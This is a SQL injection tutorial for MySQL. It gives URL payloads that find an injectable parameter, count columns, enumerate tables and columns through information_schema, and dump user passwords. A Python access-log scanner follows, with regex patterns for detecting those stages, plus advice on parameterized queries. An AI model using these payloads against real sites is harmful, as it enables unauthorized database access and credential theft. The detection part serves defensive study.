

UNION SQL injection (MySQL)

1. Confirm the vulnerability
http://www.test.com/article.php?id=1'
=> DBMS error

2. Get the number of columns
http://www.test.com/article.php?id=1 order by 1 (true)
http://www.test.com/article.php?id=1 order by 5 (false)
http://www.test.com/article.php?id=1 order by 4 (true)

3. Get the database name
http://www.test.com/article.php?id=-1 union select null,null,null,database()
=> article

4. Get the table names in the database (article)
http://www.test.com/article.php?id=-1 union select null,null,null,group_concat(distinct table_name SEPARATOR ' ') FROM information_schema.columns WHERE table_schema='article'
=> news permissions profiles roles users users_roles

5. Get the column names (users table)
http://www.test.com/article.php?id=-1 union select null,null,null,group_concat(distinct column_name SEPARATOR ' ') FROM information_schema.columns WHERE table_schema='article' AND table_name='users'--
=> id username fullname enc_password

6. Get the data
http://www.test.com/article.php?id=-1 union select null,null,null,group_concat(id,0x3a,enc_password SEPARATOR '<br />') FROM article.users--
=> admin:admin
     test:1234
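
Seen from the defending side, the six steps above leave a recognizable trail in the web server's access log. The following is an added example, not part of the original post: it scans log lines for that progression on the `id` parameter. The log format, the stage labels, the signatures and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic signatures for the stages in the walkthrough (assumed, not exhaustive).
SIGNATURES = [
    ("column_count", re.compile(r"order\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("bulk_extract", re.compile(r"group_concat\s*\(", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def classify(value):
    """Return the stage labels that one decoded parameter value matches."""
    if re.fullmatch(r"\d+", value):
        return []  # a plain integer id is the only benign shape
    text = INLINE_COMMENT.sub(" ", value)  # /**/ often stands in for spaces
    labels = [name for name, rx in SIGNATURES if rx.search(text)]
    if not labels and text.rstrip().endswith(("'", '"')):
        labels.append("quote_probe")
    return labels or ["non_numeric_id"]

def scan(lines, param="id"):
    """Map client address -> ordered, de-duplicated stage labels seen for param."""
    seen = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for label in classify(value) if key == param else []:
                stages = seen.setdefault(client, [])
                if label not in stages:
                    stages.append(label)
    return seen

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /article.php?id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1%27 HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /article.php?id=1+order+by+5 HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /article.php?id=-1%20UNION/**/SELECT%20null,null,null,database() HTTP/1.1" 200 4800',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /article.php?id=-1+union+select+null,null,null,group_concat(table_name)+from+information_schema.columns HTTP/1.1" 200 4900',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A client that moves from `quote_probe` through `column_count` to `schema_enum` within a short window is a much stronger signal than any single match. The durable fix is still a parameterized query plus integer validation of `id` in the application.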
